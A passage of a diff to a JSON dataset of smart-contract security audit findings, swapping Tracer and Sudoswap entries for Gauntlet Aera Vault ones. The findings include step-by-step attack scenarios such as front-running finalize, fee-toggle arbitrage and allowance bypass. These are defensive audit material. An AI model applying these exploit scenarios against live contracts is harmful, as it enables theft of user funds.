to near but above 3k). According to the current weights, they can get 9k*(1 - 1/r) = 3.33k DAI from the pool, where r = (20.4)(1/0.6). 6. As a result the attacker profits 3.33k - 3k = 0.33k DAI.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Undocumented frontrunning protection", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "PoolFactory deployPool() per(deploymentParameters.oracleWrapper).deployer() == msg.sender frontrunning the deployment transaction of the pool. function the In of contract, check the protects IOracleWrap- against This is because the poolCommitter, LeveragedPool and the pair tokens instances are deployed at a deterministic address, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because of the different msg.sender address, that causes the deployer() check to fail. Alternatively, the attacker will have a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require( IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\" ); ... bytes32 uniquePoolHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper ) ); PoolCommitter poolCommitter = PoolCommitter( Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash) ); ... LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash)); ... } function deployPairToken(... ) internal returns (address) { ... bytes32 uniqueTokenHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper, direction ) ); PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, ,! uniqueTokenHash)); ... }", + "title": "allowance() doesnt limit withdraw()s", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The allowance() function is meant to limit withdraw amounts. However, allowance() can only read and not alter state because its visibility is set to view. Therefore, the withdraw() function can be called on demand until the entire Vault/Pool balance has been drained, rendering the allowance() function ineffective. function withdraw(uint256[] calldata amounts) ... { ... uint256[] memory allowances = validator.allowance(); ... for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable(... ); } } } // can't update state due to view function allowance() external view override returns (uint256[] memory amounts) { amounts = new uint256[](count); for (uint256 i = 0; i < count; i++) { amounts[i] = ANY_AMOUNT; } } from both IWithdrawal-", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "No event exists for users self-claiming commits", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim() which does emit the PaidRequestExecution event.", + "title": "Malicious manager could cause Vault funds to be inaccessible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The calculateAndDistributeManagerFees() function pushes tokens to the manager and if for unknown reasons this action fails the entire Vault would be blocked and funds become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore final- ize() as well. Within calculateAndDistributeManagerFees() the function safeTransfer() is the riskiest and could fail under the following situations: A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly. A token with a blacklist option is used and the manager is blacklisted. For example USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exist that he is malicious and his address could be blacklisted in USDC. Note: set as high risk because although probability is very small, impact results in Vault funds to become inacces- sible. function calculateAndDistributeManagerFees() internal { ... for (uint256 i = 0; i < amounts.length; i++) { tokens[i].safeTransfer(manager, amounts[i]); } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Mixups of types and scaling factors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used: uint (no scaling) uint (WAD scaling) ABDKMathQuad ABDKMathQuad (WAD scaling) Solidity >0.8.9s user defined value types could be used to prevent mistakes. This will require several typecasts, but they dont add extra gas costs.", + "title": "updateWeightsGradually allows change rates to start in the past with a very high maximumRatio", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current updateWeightsGradually is using startTime instead of time that should be Math.max(block.timestamp, startTime). Because internally Balancer will use startTime = Math.max(currentTime, startTime); as the startTime, this allows to: the minimal start Have a startTime in the past. Have a targetWeights[i] higher than allowed. We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check it is still needed in the Aera implementation to prevent transactions to revert because of an underflow error on uint256 duration = endTime - startTime;", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways.", + "title": "The vault manager has unchecked power to create arbitrage using setSwapFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "A previously known issue was that a malicious vault manager could arbitrage the vault like in the below scenario: 1. Set the swap fees to a high value by setSwapFee (10% is the maximum). 2. Wait for the market price to move against the spot price. 3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault. The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_- PERCENT_CHANGE each time. However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Terminology used for tokens and oracles is not clear and consistent across codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Different terms are used across the codebase to address the different tokens, leading to some mixups. Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply: collateral token == quote token == settlement token == WETH pool token == long token + short token == long BTC/USDC + short BTC/USDC As for the oracles: settlementEthOracle is the oracle for settlement in ETH (WETH/ETH) oracleWrapper is the oracle for BTC/USDC Here is an example of a mixup: The comments in getMint() and getBurn() are different while their result should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens. * @notice Calculates the number of pool tokens to mint, given some settlement token amount and a ,! price ... * @return Quantity of pool tokens to mint ... function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... } * @notice Calculate the number of settlement tokens to burn, based on a price and an amount of ,! pool tokens //settlement & pool seem reversed ... * @return Quantity of pool tokens to burn ... function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... } The settlementTokenPrice variable in keeperGas() is misleading and not clear whether it is Eth per Settlement or Settlement per Eth. contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = ,! IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } }", + "title": "Implement a function to claim liquidity mining rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancer offers a liquidity mining rewards distribution for liquidity providers. Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquid- ity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances which are stored in a Merkle tree. Claim- ing through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards, and when claiming multiple tokens. The AeraVault is itself the only liquidity provider of the Balancer pool deployed, so each week its entitled to claim those rewards. Currently, those rewards cannot be claimed because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever.", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Incorrect NatSpec and comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Some NatSpec documentation and comments contain incorrect or unclear information. In PoolSwapLibraryL283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncom- mitment, which is not longer supported. * @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts, * function isBeforeFrontRunningInterval(...) which is allowed for uncommitment. In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused while the require checks that it is paused. * @dev Pool must not be paused function withdrawQuote() ... { require(paused, \"Pool is live\"); In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays. // The most recent update interval in which a user committed mapping(address => uint256[]) public unAggregatedCommitments; In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong. The @param lines order should be switched. @param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to /** * @notice Mints pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens to + * @param account Account to mint pool tokens to + * @param amount Pool tokens to mint */ function mint(address account, uint256 amount) external override onlyOwner { ... } In PoolToken.sol#L25-L32 the order of the @param lines is reversed. 47 /** * @notice Burns pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens from + * @param account Account to burn pool tokens from + * @param amount Pool tokens to burn */ function burn(address account, uint256 amount) external override onlyOwner { ... } In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It would also be suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool. /** * @notice Deploy a contract for pool tokens + * @param pool The pool address, owner of the Pool Token * @param leverage Amount of leverage for pool * @param deploymentParameters Deployment parameters for parent function * @param direction Long or short token, L- or S- * @return Address of the pool token */ function deployPairToken( - + address poolOwner, address pool, string memory leverage, PoolDeployment memory deploymentParameters, string memory direction ) internal returns (address) { ... pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); ... - + } In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed. * @param amount ... * @param oppositePrice ... ... function getMintWithBurns( ... bytes16 oppositePrice, uint256 amount, ... ) public pure returns (uint256) { ... In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of contract ERC20_Cloneable mentions a default value of 18 for decimals. However, it doesnt use this default value, but the supplied parameter. Moreover, a comment at the constructor of ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts, and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function. 48 @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * To select a different value for {decimals}, use {_setupDecimals}. * * construction. All three of these values are immutable: they can only be set once during ... constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) { _decimals = decimals_; } function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_) ,! external initializer { owner = _pool; _name = name_; _symbol = symbol_; _decimals = decimals_; }", + "title": "Owner can circumvent allowance() via enableTradingWithWeights()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The vault Owner can set arbitrary weights via disableTrading() and then call enableTrading- WithWeights() to set the spot price and create arbitrage opportunities for himself. This way allowance() in withdraw() checks, which limit the amount of funds an owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time. Also see the following issues: allowance() doesnt limit withdraw()s enableTradingWithWeights allow the Treasury to change the pools weights even if the swap is not disabled Separation of concerns Owner and Manager function disableTrading() ... onlyOwnerOrManager ... { setSwapEnabled(false); } function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... { ... pool.updateWeightsGradually(timestamp, timestamp, weights); setSwapEnabled(true); } function enableTradingRiskingArbitrage() ... onlyOwner ... { setSwapEnabled(true); } 13", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Partial fills are currently supported for buy orders in VeryFastRouter.swap(). When _findMaxFil- lableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has so many items left to fill. While ERC721 swap handles the scenario where pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert which defeats the purpose of swap().", + "title": "Front-running attacks on finalize could affect received token amounts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce the minimum amount of received tokens. Without such check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows: 1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that WETH and DAI weights are both 0.5. 2. An attacker front-runs the Treasurys transaction and swaps in 3000 DAI to get 0.5 WETH from the pool. 3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI. Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such trade (e.g., if a timelock controls it). Notice that the attacker may not profit from the swap because of slippage but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Function token() of cloneERC1155ERC20Pair() reads from wrong location", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function token() loads the token data from position 81. However on ERC1155 pairs it should load it from position 93. Currently, it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: LSSVMPair.sol: 20))) ,! LSSVMPair.sol: 40))) ,! LSSVMPair.sol: 60))) _factory _bondingCurve := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), ,! LSSVMPairERC1155.sol: id LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), := calldataload(add(sub(calldatasize(), paramsLength), 61)) 61))) ,! LSSVMPairERC20.sol: ,! 81))) _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), function cloneERC1155ERC20Pair(... ) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes // position 40 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 60 - 1 bytes mstore8(add(ptr, 0x7a), poolType) // position 61 - 32 bytes mstore(add(ptr, 0x7b), nftId) mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... // position 0 } } 6", + "title": "safeApprove in depositToken could revert for non-standard token like USDT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Some non-standard tokens like USDT will revert when a contract or a user tries to approve an al- lowance when the spender allowance has already been set to a non zero value. In the current code we have not seen any real problem with this fact because the amount retrieved via depositToken() is approved send to the Balancer pool via joinPool() and managePoolBalance(). Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unfore- seen situation) then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits. Note: Set to medium risk because the probability of this happening is low but impact would be high. We also should note that OpenZeppelin has officially deprecated the safeApprove function, suggesting to use instead safeIncreaseAllowance and safeDecreaseAllowance.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Switched order of update leads to incorrect partial fill calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "In the binary search, the order of updation of start and numItemsToFill is switched with start being updated before numItemsToFill which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when binary search recurses on the right half.", + "title": "Consult with Balancer team about best approach to add and remove funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault uses AssetManagers functionality of function managePoolBalance() to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to future unexpected behavior. Additionally, this disables the capacity to implement the original intention of AssetManagers functionality, e.g. storing funds elsewhere to generate yield.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While VeryFastRouter swap function supports sell orders to specify property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same.", + "title": "Fee on transfer can block several functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Some tokens have a fee on transfer, for example USDT. Usually such fee is not enabled but could be re-enabled at any time. With this fee enabled the withdrawFromPool() function would receive slightly less tokens than the amounts requested from Balancer causing the next safeTransfer() call to fail because there are not enough tokens inside the contract. This means withdraw() calls will fail. Functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code. Note: The function returnFunds() is more robust and can handle this problem. Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium. function withdraw(uint256[] calldata amounts) ... { ... withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer ... for (uint256 i = 0; i < amounts.length; i++) { if (amounts[i] > 0) { tokens[i].safeTransfer(owner(), amounts[i]); // could revert it the full amounts[i] isn't ,! available ... } ... } }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "pairTransferERC20From() only supports ERC721 NFTs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Function pairTransferERC20From() which is is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, \"Not ERC20 pair\"); ... } 7", + "title": "enableTradingWithWeights allow the Treasury to change the pools weights even if the swap is not disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights. The function does not verify if the pools swap feature is enabled and for this reason, as a result, it allows the Treasury to act as the manager who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pools swap is disabled.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells as noted in the comment: \"// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set\"). this While ERC1155.swapTokenForSpecificNFTs(), trading fee of only tradeFee (instead of 2*tradeFee). enforced in is LSSVMPairERC721.swapTokenForSpecificNFTs() LSSVMPairERC1155.swapTokenForAnyNFTs() and LSSVMPair- a enforces Affected LPs of pairs targeted by LSSVMPairERC1155. swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees.", + "title": "AeraVault constructor is not checking all the input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The Aera Vault constructor has the role to handle Balancers ManagedPool deployment. The con- structor should increase the number of user input validation and the Gauntlet team should be aware of the possible edge case that could happen given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We are going to list all the worst-case scenarios that could happen given the premise that the deployments are handled by the Treasury. 1. factory could be a wrapper contract that will deploy a ManagedPool. This would mean that the deployer could pass correct parameters to Aera Vault to pass these checks, but will use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool. 2. swapFeePercentage value is not checked. On Balancer, the deployment will revert if the value is not in- side this range >= 1e12 (0.0001%) and <= 1e17 (10% - this fits in 64 bits). Without any check, the Gauntlet accept to follow the Balancers swap requirements. 3. manager_ is not checked. They could set the manager as the Treasury (owner of the vault) itself. This would give the Treasury the full power to manage the Vault. At least these values should be checked: address(0), address(this) or owner(). The same checks should also be done in the setManager() function. 4. validator_ could be set to a custom contract that will give full allowances to the Treasury. This would make the withdraw() act like finalize() allowing to withdraw all the funds from the vault/pool. 17 5. noticePeriod_ has only a max value check. Gauntlet team explained that a time delay between the ini- tialization of the finalize process and the actual finalize is needed to prevent the Treasury to be able to instantly withdraw all the funds. Not having a min value check allow the Treasury to set the value to 0 so there would be no delay between the initiateFinalization() and finalize() because noticeTimeoutAt == block.timestamp. 6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager because the managerFeeIndex would always be 0. 7. description_ can be empty. From the Specification PDF, the description of the vault has the role to De- scribes vault purpose and modelling assumptions for differentiating between vaults. Being empty could lead to a bad UX for external services that needs to differentiate different vaults. These are all the checks that are done directly by Balancer during deployment via the Pool Factory: BasePool constructor#L94-L95 min and max number of tokens. BasePool constructor#L102token array is sorted following Balancer specification (sorted by token address). BasePool constructor calling _setSwapFeePercentage min and max value for swapFeePercentage. BasePool constructor calling vault.registerTokens token address uniqueness (cant have same Following the pathBasePool is calling from function _registerMinimalSwapInfoPoolTokens it also checks that token != IERC20(0). should that call token in the pool), vault.registerTokens MinimalSwapInfoPoolsBalance. ManagedPool constructor calling _startGradualWeightChange Check min value of weight and that the total sum of the weights are equal to 100%. _startGradualWeightChange internally check that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Royalty not always being taken into account leads to incorrect protocol accounting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens will be received. Then it calls swapNFTs- ForToken() with 0 as minExpectedTokenOutput; so it will accept any amount of tokens. The swapNFTsForToken() does subtract the Royalties which will result in a lower amount of tokens received and might not be enough to satisfy the requirements of the seller. The same happens in robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken. Note: Function getSellNFTQuote() of StandardSettings.sol also uses getSellNFTQuote(). However there it is compared to the results of getBuyInfo(); so this is ok as both don't take the royalties into account. Note: getNFTQuoteForSellOrderWithPartialFill() also has to take royalties into account. 8 function getSellNFTQuote(uint256 numNFTs) ... { ( (...., outputAmount, ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(uint256 assetId, uint256 numNFTs) ... { (..., outputAmount, ... ) = bondingCurve().getSellInfo(...); (,, uint256 royaltyTotal) = _calculateRoyaltiesView(assetId, outputAmount); ... outputAmount -= royaltyTotal; } function robustSwapNFTsForToken(...) ... { ... (error,,, pairOutput,) = swapList[i].swapInfo.pair.getSellNFTQuote(swapList[i].swapInfo.nftIds.length); ... if (pairOutput >= swapList[i].minOutput) { ....swapNFTsForToken(..., 0, ...); } ... ,! } function swapNFTsForToken(...) ... { ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(numNFTs[0], _bondingCurve, _factory); (... royaltyTotal) = _calculateRoyalties(nftId(), outputAmount); ... outputAmount -= royaltyTotal; ... _sendTokenOutput(tokenRecipient, outputAmount); ,! }", + "title": "Possible mismatch between Validator.count and AeraVault assets count", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "A weak connection between WithdrawalValidator and Aera Vault could lead to the inability of withdrawing from a Vault. Consider the following scenario: The Validator is deployed with a tokenCount < than Vault.getTokens().length. Inside the withdraw() function we reference the following code block: uint256[] memory allowances = validator.allowance(); uint256[] memory weights = getNormalizedWeights(); uint256[] memory newWeights = new uint256[](tokens.length); for (uint256 i = 0; i < tokens.length; i++) { if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) { revert Aera__AmountExceedAvailable( address(tokens[i]), amounts[i], holdings[i].min(allowances[i]) ); } } A scenario where allowances.length < tokens.length would cause this function to revert with an Index out of bounds error. The only way for the Treasury to withdraw funds would be via the finalize() method which has a time delay.", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Medium Risk" ] }, { - "title": "Error return codes of getBuyInfo() and getSellInfo() are sometimes ignored", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The functions getBuyInfo() and getSellInfo() return an error code when they detect an error. The rest of the returned parameters then have an unusable/invalid value (0). However, some callers of these functions ignore the error code and continue processing with the other unusable/invalid values. The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() pass through the error code, so their callers have to check the error codes too. 9 function getBuyInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getSellInfo(...) ... returns (CurveErrorCodes.Error error, ... ) { } function getBuyNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getBuyInfo(...); } function getSellNFTQuote(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); } function getSellNFTQuoteWithRoyalties(...) ... returns (CurveErrorCodes.Error error, ... ) { (error, ... ) = bondingCurve().getSellInfo(...); }", + "title": "Ensure vaults deployment integrity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The treasury could deploy on purpose or by accident a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by parties taking on Manager responsibilities (e.g. usually Gauntlet will be involved here).", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "changeSpotPriceAndDelta() only uses ERC721 version of balanceOf()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function changeSpotPriceAndDelta() uses balanceOf() with one parameter. This is the ERC721 variant. In order to support ERC1155, a second parameter of the NFT id has to be supplied. function changeSpotPriceAndDelta(address pairAddress, ...) public { ... if ((newPriceToBuyFromPair < priceToBuyFromPair) && pair.nft().balanceOf(pairAddress) >= 1) { ... } }", + "title": "Frequent calling of calculateAndDistributeManagerFees() lowers fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently his fees will be lower. For example: If he calls it twice, while both time getting 1%, he actually gets: 1% + 1% * (100% - 1%) = 1.99% If he waits longer until he has earned 2%, he actually gets: 2%, which is slightly more than 1.99% If called very frequently the fees go to 0 (especially taking in account the rounding down). However the gas cost would be very high. The Manager can (accidentally) do this by calling claimManagerFees(). The Owner can (accidentally or on pur- pose (e.g. using 0 balance change) ) do this by calling deposit(), withdraw() or setManager(). Note: Rounding errors make this slightly worse. Also see the following issue: Possible rounding down of fees function claimManagerFees() ... { calculateAndDistributeManagerFees(); // get a percentage of the Pool }", "labels": [ "Spearbit", - "SudoswapLSSVM2", - "Severity: High Risk" + "Gauntlet", + "Severity: Low Risk" ] }, { - "title": "_pullTokenInputAndPayProtocolFee() doesn't check that tokens are received", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The function _pullTokenInputAndPayProtocolFee() doesn't verify that it actually received the to- kens after doing 